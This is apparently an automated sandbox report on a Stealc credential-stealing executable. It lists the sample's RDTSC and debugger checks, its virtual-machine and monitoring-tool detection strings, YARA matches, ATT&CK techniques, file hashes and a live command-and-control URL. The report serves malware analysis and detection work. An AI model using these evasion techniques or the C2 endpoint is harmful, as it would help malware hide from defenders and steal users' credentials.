                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A965DF second address: A965EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jo 00007F74491B01D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A965EB second address: A965F7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7448D39FFEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A0FE second address: A9A103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A103 second address: A9A117 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7448D39FFDh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA02B7 second address: AA02BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA02BB second address: AA02BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA02BF second address: AA02C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0119 second address: AA0132 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D3A005h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8A0D second address: AB8A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F74491B01E4h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABAA7C second address: ABAA9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7448D3A008h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABA748 second address: ABA750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABA750 second address: ABA75C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABDB03 second address: ABDB0D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F74491B01D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABDB0D second address: ABDB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F7448D3A011h 0x0000000c jmp 00007F7448D3A005h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABDB30 second address: ABDB34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABDB34 second address: ABDB88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D3A009h 0x00000007 je 00007F7448D39FF8h 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jnc 00007F7448D3A02Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F7448D39FFFh 0x0000001e jmp 00007F7448D3A008h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACB82A second address: ACB85C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F74491B01D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e push edi 0x0000000f push edx 0x00000010 pop edx 0x00000011 jl 00007F74491B01D6h 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F74491B01E8h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC61F second address: ACC647 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D3A001h 0x00000007 jo 00007F7448D39FFEh 0x0000000d push esi 0x0000000e pop esi 0x0000000f js 00007F7448D39FF6h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC647 second address: ACC64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC64D second address: ACC651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF587 second address: ACF591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF591 second address: ACF596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF596 second address: ACF59B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD0B5B second address: AD0B78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7448D3A009h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD3523 second address: AD3527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD37D4 second address: AD37DE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7448D39FF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD37DE second address: AD3832 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push ebx 0x0000000d sub dword ptr [ebp+124494FFh], eax 0x00000013 pop edx 0x00000014 push 00000004h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F74491B01D8h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov dword ptr [ebp+12459DDEh], ecx 0x00000036 push 70C96AC1h 0x0000003b push eax 0x0000003c push edx 0x0000003d jnp 00007F74491B01D8h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD3832 second address: AD383C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F7448D39FF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD3B51 second address: AD3B5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F74491B01D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD54CA second address: AD54CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512031F second address: 5120343 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F74491B01E0h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120343 second address: 5120349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51203C4 second address: 51203C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51203C8 second address: 51203CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9DFAF6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9DF7AE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A6C57E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_005F38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005F4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_005EDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_005EE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_005F4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_005EED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_005EBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005EDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005E16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005EF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_005F3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E1160 GetSystemInfo,ExitProcess,0_2_005E1160
                Source: file.exe, file.exe, 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1699870972.0000000001184000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPc
                Source: file.exe, 00000000.00000002.1699870972.00000000011C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1699870972.000000000113E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13559
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13556
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13579
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13571
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13611
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E45C0 VirtualProtect ?,00000004,00000100,000000000_2_005E45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_005F9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F9750 mov eax, dword ptr fs:[00000030h]0_2_005F9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_005F7850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6996, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_005F9600
                Source: file.exe, 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: I,\Program Manager
                Source: file.exeBinary or memory string: I,\Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_005F7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_005F6920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_005F7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_005F7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.5e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1659012750.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1699870972.000000000113E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6996, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.5e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1659012750.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1699870972.000000000113E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6996, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe42%VirustotalBrowse
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpTIfile.exe, 00000000.00000002.1699870972.0000000001196000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37file.exe, 00000000.00000002.1699870972.000000000113E000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpXIfile.exe, 00000000.00000002.1699870972.0000000001196000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/wsfile.exe, 00000000.00000002.1699870972.0000000001196000.00000004.00000020.00020000.00000000.sdmptrueunknown
                    http://185.215.113.37/e2b1563c6670f193.phpLIfile.exe, 00000000.00000002.1699870972.0000000001196000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.215.113.37
                      		unknownPortugal
                      		206894WHOLESALECONNECTIONSNLtrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1522481
                      Start date and time:2024-09-30 08:57:05 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 2m 40s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:1
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 80%
                      • Number of executed functions: 19
                      • Number of non-executed functions: 82
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated

                      Warnings

                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      SecuriteInfo.com.Win32.Evo-gen.16378.4678.exeGet hashmaliciousAmadey, StealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousAmadey, StealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      SecuriteInfo.com.Win32.Evo-gen.16378.4678.exeGet hashmaliciousAmadey, StealcBrowse
                      • 185.215.113.103
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousAmadey, StealcBrowse
                      • 185.215.113.103
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      No created / dropped files found

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.948611109269336
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'868'800 bytes
                      MD5:f74ed5926c551ea89e49d964e729e736
                      SHA1:115d45e11d815a3773f95b401ac64711c3a3e99c
                      SHA256:c978352670126322d013cb1afb3b8ce7bfcc1f0a39765f5dead460dc7f608717
